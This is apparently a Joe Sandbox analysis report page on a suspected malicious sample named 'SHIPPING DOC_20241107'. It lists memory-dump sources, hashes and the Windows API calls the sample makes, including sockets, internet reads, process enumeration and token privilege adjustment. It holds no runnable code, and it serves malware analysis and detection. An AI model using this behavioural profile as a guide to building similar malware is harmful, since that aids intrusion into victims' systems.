                                                                                                                              • Source File: 00000000.00000002.348332982.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.348329030.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348348252.0000000000A3F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348348252.0000000000A64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348358896.0000000000A6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348363348.0000000000A77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_9b0000_SHIPPING DOC_20241107.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: ColorProc$LongWindow
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 3744519093-0
                                                                                                                              • Opcode ID: 88faa288370336d9fd804d4f6d1d2f1c6e61faa1ee34d4a6eae9bb4bc913aa3c
                                                                                                                              • Instruction ID: cb13992b44075dd015d631ac3358c0851247679dc5aa1b4bf2e4d27c0d2ba556
                                                                                                                              • Opcode Fuzzy Hash: 88faa288370336d9fd804d4f6d1d2f1c6e61faa1ee34d4a6eae9bb4bc913aa3c
                                                                                                                              • Instruction Fuzzy Hash: 93A1AD711115C4FEEB39AB699F78EFF369DDB417B1F94091AF006D10A1CB28AD0192B1
                                                                                                                              APIs
                                                                                                                                • Part of subcall function 00A27EA0: inet_addr.WSOCK32(00000000,?,00000000,?,?,?,00000000), ref: 00A27ECB
                                                                                                                              • socket.WSOCK32(00000002,00000002,00000011,?,?,00000000), ref: 00A268B4
                                                                                                                              • WSAGetLastError.WSOCK32(00000000), ref: 00A268DD
                                                                                                                              • bind.WSOCK32(00000000,?,00000010), ref: 00A26916
                                                                                                                              • WSAGetLastError.WSOCK32(00000000), ref: 00A26923
                                                                                                                              • closesocket.WSOCK32(00000000,00000000), ref: 00A26937
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.348332982.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.348329030.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348348252.0000000000A3F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348348252.0000000000A64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348358896.0000000000A6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348363348.0000000000A77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_9b0000_SHIPPING DOC_20241107.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: ErrorLast$bindclosesocketinet_addrsocket
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 99427753-0
                                                                                                                              • Opcode ID: 21d300986f619caada063182e26bd75069a8051d2df42ded27a24e3ab8705900
                                                                                                                              • Instruction ID: f1519734cade08d856b3f9cc8670c48ef5cf36ce6bdd400868166fa801572c98
                                                                                                                              • Opcode Fuzzy Hash: 21d300986f619caada063182e26bd75069a8051d2df42ded27a24e3ab8705900
                                                                                                                              • Instruction Fuzzy Hash: C9410D31A10214AFDB10BF68DD86F7E77A9DF48720F44805CFA06AB3D2CA709D018751
                                                                                                                              APIs
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.348332982.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.348329030.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348348252.0000000000A3F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348348252.0000000000A64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348358896.0000000000A6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348363348.0000000000A77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_9b0000_SHIPPING DOC_20241107.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: Window$EnabledForegroundIconicVisibleZoomed
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 292994002-0
                                                                                                                              • Opcode ID: b2e4be4ec1d79eef19d7b43df00f5254427912fdbd85f685f63fcd617772dc09
                                                                                                                              • Instruction ID: 35b1cb4ecee0ac3113088891e447e84fc14fc4d5b89d3a576b26d60358668afe
                                                                                                                              • Opcode Fuzzy Hash: b2e4be4ec1d79eef19d7b43df00f5254427912fdbd85f685f63fcd617772dc09
                                                                                                                              • Instruction Fuzzy Hash: 2411E331F00A116FE7259F7ADC45B6EBBAAFF84722F048428F846D7251CB70D842C6A5
                                                                                                                              APIs
                                                                                                                              • LoadLibraryA.KERNEL32(kernel32.dll), ref: 00A2C112
                                                                                                                              • GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryW,?,009F1CB7,?), ref: 00A2C124
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.348332982.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.348329030.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348348252.0000000000A3F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348348252.0000000000A64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348358896.0000000000A6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348363348.0000000000A77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_9b0000_SHIPPING DOC_20241107.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: AddressLibraryLoadProc
                                                                                                                              • String ID: GetSystemWow64DirectoryW$kernel32.dll
                                                                                                                              • API String ID: 2574300362-1816364905
                                                                                                                              • Opcode ID: e6b187ee8c643066a013a5116a365b5ab9f2c7405c8bb3eb0e17522c0fbea82d
                                                                                                                              • Instruction ID: fe952251f23487f7519418ffa0d779b8f359d3e7956e37b35706628572140ab6
                                                                                                                              • Opcode Fuzzy Hash: e6b187ee8c643066a013a5116a365b5ab9f2c7405c8bb3eb0e17522c0fbea82d
                                                                                                                              • Instruction Fuzzy Hash: C5E0EC78A10733DFDB209F69EC19A4676E8EF09765B40893AE895D2260E774D841CB50
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.348332982.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.348329030.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348348252.0000000000A3F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348348252.0000000000A64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348358896.0000000000A6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348363348.0000000000A77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_9b0000_SHIPPING DOC_20241107.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: __itow__swprintf
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 674341424-0
                                                                                                                              • Opcode ID: 9e5ca61f89513a7bf05e195c61af138eb7119574ea82e379dfe0a17d741dedd7
                                                                                                                              • Instruction ID: e0a4d8780f52bdb059065541d9d260d9c2bff060197c48d7f899fe19223f0157
                                                                                                                              • Opcode Fuzzy Hash: 9e5ca61f89513a7bf05e195c61af138eb7119574ea82e379dfe0a17d741dedd7
                                                                                                                              • Instruction Fuzzy Hash: 5E22A971A183019FC724DF64C981BAEB7E8AFC4314F14891DF99A97291DB31EA04CB93
                                                                                                                              APIs
                                                                                                                              • CreateToolhelp32Snapshot.KERNEL32 ref: 00A2EF51
                                                                                                                              • Process32FirstW.KERNEL32(00000000,?), ref: 00A2EF5F
                                                                                                                                • Part of subcall function 009B7F41: _memmove.LIBCMT ref: 009B7F82
                                                                                                                              • Process32NextW.KERNEL32(00000000,?), ref: 00A2F01F
                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 00A2F02E
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.348332982.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.348329030.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348348252.0000000000A3F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348348252.0000000000A64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348358896.0000000000A6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348363348.0000000000A77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_9b0000_SHIPPING DOC_20241107.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32_memmove
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 2576544623-0
                                                                                                                              • Opcode ID: 30f3c83c09c336511a75eef1b1a10828abdb56232112336a2132f52c9556e9a6
                                                                                                                              • Instruction ID: 1f0235d2a6b7307d774086dc4aed21837ef3f22b2e76e92bf622b5b42e775802
                                                                                                                              • Opcode Fuzzy Hash: 30f3c83c09c336511a75eef1b1a10828abdb56232112336a2132f52c9556e9a6
                                                                                                                              • Instruction Fuzzy Hash: 4B516D71508310AFD310EF24DD85FABB7E8AF84710F10492DF59697251EB70A904CB92
                                                                                                                              APIs
                                                                                                                              • lstrlenW.KERNEL32(?,?,?,00000000), ref: 00A0E93A
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.348332982.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.348329030.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348348252.0000000000A3F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348348252.0000000000A64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348358896.0000000000A6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348363348.0000000000A77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_9b0000_SHIPPING DOC_20241107.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: lstrlen
                                                                                                                              • String ID: ($|
                                                                                                                              • API String ID: 1659193697-1631851259
                                                                                                                              • Opcode ID: cde32a4b9f3e52930dcc21702eb9bf7c1b3fea401270d7907adc2a81c5497f97
                                                                                                                              • Instruction ID: 48e328cff9bca38ce2ceb4c760d07b1b6729ebfaabe3583f686f41b853d7e0ea
                                                                                                                              • Opcode Fuzzy Hash: cde32a4b9f3e52930dcc21702eb9bf7c1b3fea401270d7907adc2a81c5497f97
                                                                                                                              • Instruction Fuzzy Hash: B8321575A006099FD728CF59D481A6AF7F1FF48320B15C96EE89ADB3A1E770E941CB40
                                                                                                                              APIs
                                                                                                                              • InternetQueryDataAvailable.WININET(00000001,?,00000000,00000000), ref: 00A224F7
                                                                                                                              • InternetReadFile.WININET(00000001,00000000,00000001,00000001), ref: 00A2252E
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.348332982.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.348329030.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348348252.0000000000A3F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348348252.0000000000A64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348358896.0000000000A6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348363348.0000000000A77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_9b0000_SHIPPING DOC_20241107.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: Internet$AvailableDataFileQueryRead
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 599397726-0
                                                                                                                              • Opcode ID: ed1be581bae095b4aadcabf5a6f4ddcef2a9ef254a0b92114871d5baf690c26f
                                                                                                                              • Instruction ID: aa44e5a03b4b87004c86ea5c723eaf8c1cc760893c3f51eb8248e4a911f0931e
                                                                                                                              • Opcode Fuzzy Hash: ed1be581bae095b4aadcabf5a6f4ddcef2a9ef254a0b92114871d5baf690c26f
                                                                                                                              • Instruction Fuzzy Hash: 8941C571904219BFEB20DF99EC95FBBB7BCEB80724F10807AF601A7241DA759E419760
                                                                                                                              APIs
                                                                                                                              • SetErrorMode.KERNEL32(00000001), ref: 00A1B3CF
                                                                                                                              • GetDiskFreeSpaceExW.KERNEL32(?,?,?,?), ref: 00A1B429
                                                                                                                              • SetErrorMode.KERNEL32(00000000,00000001,00000000), ref: 00A1B476
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.348332982.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.348329030.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348348252.0000000000A3F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348348252.0000000000A64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348358896.0000000000A6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348363348.0000000000A77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_9b0000_SHIPPING DOC_20241107.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: ErrorMode$DiskFreeSpace
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 1682464887-0
                                                                                                                              • Opcode ID: 1e53df9eee96d65b93c94f33b86e339a8a489474ce92f238f13104af208af2f6
                                                                                                                              • Instruction ID: 5023554957d85b4b592f6a07cca7e52bfd247adbc01308fc398180fc1d854172
                                                                                                                              • Opcode Fuzzy Hash: 1e53df9eee96d65b93c94f33b86e339a8a489474ce92f238f13104af208af2f6
                                                                                                                              • Instruction Fuzzy Hash: D3215135A10118DFCB00EFA5D984EEDBBB8FF49310F1480A9F905AB351CB319955CB50
                                                                                                                              APIs
                                                                                                                                • Part of subcall function 009D0F36: std::exception::exception.LIBCMT ref: 009D0F6C
                                                                                                                                • Part of subcall function 009D0F36: __CxxThrowException@8.LIBCMT ref: 009D0F81
                                                                                                                              • LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00A08AED
                                                                                                                              • AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00A08B1A
                                                                                                                              • GetLastError.KERNEL32 ref: 00A08B27
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.348332982.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.348329030.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348348252.0000000000A3F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348348252.0000000000A64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348358896.0000000000A6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348363348.0000000000A77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_9b0000_SHIPPING DOC_20241107.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: AdjustErrorException@8LastLookupPrivilegePrivilegesThrowTokenValuestd::exception::exception
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 1922334811-0
                                                                                                                              • Opcode ID: 11f12ccfe2b117a69dcb3df8b56d5470a90436fb065283d33049f98cf69e0b87
                                                                                                                              • Instruction ID: b4df89df9b631e3107d29b166dbb50749dd8cc99cc581e3223c5780f3d8cd86e
                                                                                                                              • Opcode Fuzzy Hash: 11f12ccfe2b117a69dcb3df8b56d5470a90436fb065283d33049f98cf69e0b87
                                                                                                                              • Instruction Fuzzy Hash: 5D11C4B1914308AFD728DF58EC85D2BB7BCFB84310B20C16EF49697251EB30AC01CA64
                                                                                                                              APIs
                                                                                                                              • AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 00A14A31
                                                                                                                              • CheckTokenMembership.ADVAPI32(00000000,?,?), ref: 00A14A48
                                                                                                                              • FreeSid.ADVAPI32(?), ref: 00A14A58
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.348332982.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.348329030.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348348252.0000000000A3F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348348252.0000000000A64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348358896.0000000000A6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348363348.0000000000A77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_9b0000_SHIPPING DOC_20241107.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: AllocateCheckFreeInitializeMembershipToken
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 3429775523-0
                                                                                                                              • Opcode ID: 855f03c7f1dd2e3723d4b0c18e969cf046c71be0d7877ed3bb30b71b2e7f271c
                                                                                                                              • Instruction ID: 752e81a737ef8484d605dd6044d00dfddf33d1095867fc1dc9afef07b2362927
                                                                                                                              • Opcode Fuzzy Hash: 855f03c7f1dd2e3723d4b0c18e969cf046c71be0d7877ed3bb30b71b2e7f271c
                                                                                                                              • Instruction Fuzzy Hash: 17F04975E5130CBFDF04DFF4DD89AAEBBBCEF08201F0044A9B905E2181E6706A448B50
                                                                                                                              APIs
                                                                                                                              • GetFileAttributesW.KERNEL32(?,009EE6F1), ref: 00A144AB
                                                                                                                              • FindFirstFileW.KERNEL32(?,?), ref: 00A144BC
                                                                                                                              • FindClose.KERNEL32(00000000), ref: 00A144CC
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.348332982.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.348329030.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348348252.0000000000A3F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348348252.0000000000A64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348358896.0000000000A6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348363348.0000000000A77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_9b0000_SHIPPING DOC_20241107.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: FileFind$AttributesCloseFirst
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 48322524-0
                                                                                                                              • Opcode ID: 409c93353ec068c223923599ec431f8161bde6253f6b5bad2e130c2ebbf26ee5
                                                                                                                              • Instruction ID: aadcacd1065e9a21839063719a077b9be0eb877d96f8aa984d557808e728800e
                                                                                                                              • Opcode Fuzzy Hash: 409c93353ec068c223923599ec431f8161bde6253f6b5bad2e130c2ebbf26ee5
                                                                                                                              • Instruction Fuzzy Hash: FDE02632C24801AF8210E7BCEC0D8EAB79CAE19375F100726F939C20E0FB749D9086D6
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.348332982.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.348329030.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348348252.0000000000A3F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348348252.0000000000A64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348358896.0000000000A6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348363348.0000000000A77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_9b0000_SHIPPING DOC_20241107.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 63417a35431808a9305814f2db1ee537c0116ca004bd9100aa96ad075db5a575
                                                                                                                              • Instruction ID: 46370c1bafc7126c408ccc5ba2c1e608824870d34ec27126d48bb6830ce235f1
                                                                                                                              • Opcode Fuzzy Hash: 63417a35431808a9305814f2db1ee537c0116ca004bd9100aa96ad075db5a575
                                                                                                                              • Instruction Fuzzy Hash: E422BE7490421ACFDB24DF58C680BFAB7F9FF44320F248469E956AB351E374A981CB91
                                                                                                                              APIs
                                                                                                                              • FindFirstFileW.KERNEL32(?,?), ref: 00A1C787
                                                                                                                              • FindClose.KERNEL32(00000000), ref: 00A1C7B7
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.348332982.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.348329030.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348348252.0000000000A3F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348348252.0000000000A64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348358896.0000000000A6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348363348.0000000000A77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_9b0000_SHIPPING DOC_20241107.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: Find$CloseFileFirst
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 2295610775-0
                                                                                                                              • Opcode ID: b1ba0f2b71c58f4e5a3ae2c65e8e924ef09e81053ee2d5aad4d3848fe29576e3
                                                                                                                              • Instruction ID: 06fbcde466d523097ad4d785f2a60b42e11e0567281ff875f71178a05f5d3d10
                                                                                                                              • Opcode Fuzzy Hash: b1ba0f2b71c58f4e5a3ae2c65e8e924ef09e81053ee2d5aad4d3848fe29576e3
                                                                                                                              • Instruction Fuzzy Hash: B1118E326102009FD710DF69D945A6AF7E8EF84334F00851EF9A9D72A1DB70A801CB81
                                                                                                                              APIs
                                                                                                                              • GetLastError.KERNEL32(00000000,?,00000FFF,00000000,00000016,?,00A2957D,?,00A3FB84,?), ref: 00A1A121
                                                                                                                              • FormatMessageW.KERNEL32(00001000,00000000,000000FF,00000000,?,00000FFF,00000000,00000016,?,00A2957D,?,00A3FB84,?), ref: 00A1A133
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.348332982.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.348329030.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348348252.0000000000A3F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348348252.0000000000A64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348358896.0000000000A6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348363348.0000000000A77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_9b0000_SHIPPING DOC_20241107.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: ErrorFormatLastMessage
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 3479602957-0
                                                                                                                              • Opcode ID: fbf6d025670b5272b0b271abbace3bc0c70fe6006552f1230db8009198546369
                                                                                                                              • Instruction ID: be508421251a72aeed3ff6ea915ebf9144bcce33344e020c9b4e039e9e52973a
                                                                                                                              • Opcode Fuzzy Hash: fbf6d025670b5272b0b271abbace3bc0c70fe6006552f1230db8009198546369
                                                                                                                              • Instruction Fuzzy Hash: C5F0823551522DBBDB119FE4CC49FEA776CFF08361F004266F919D6191D7309944CBA1
                                                                                                                              APIs
                                                                                                                              • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00A08631), ref: 00A08508
                                                                                                                              • CloseHandle.KERNEL32(?), ref: 00A0851A
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.348332982.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.348329030.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348348252.0000000000A3F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348348252.0000000000A64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348358896.0000000000A6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348363348.0000000000A77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_9b0000_SHIPPING DOC_20241107.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: AdjustCloseHandlePrivilegesToken
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 81990902-0
                                                                                                                              • Opcode ID: f59e1fd986200a537672cf347805d278a8da17a6533115dfb07f357f04533d0a
                                                                                                                              • Instruction ID: 264f601cdabe16bc3d111cb5756cc43170f36bda4b8b02da20698e5f5f7060bb
                                                                                                                              • Opcode Fuzzy Hash: f59e1fd986200a537672cf347805d278a8da17a6533115dfb07f357f04533d0a
                                                                                                                              • Instruction Fuzzy Hash: 6BE0BF71014510AEE7252B64EC09E7777A9FB84310B24842AB49681470DB616C91DB50
                                                                                                                              APIs
                                                                                                                              • SetUnhandledExceptionFilter.KERNEL32 ref: 009DA2DA
                                                                                                                              • UnhandledExceptionFilter.KERNEL32(?), ref: 009DA2E3
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.348332982.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.348329030.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348348252.0000000000A3F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348348252.0000000000A64000.00000002.00000001.01000000.00000003.sdmpDownload File
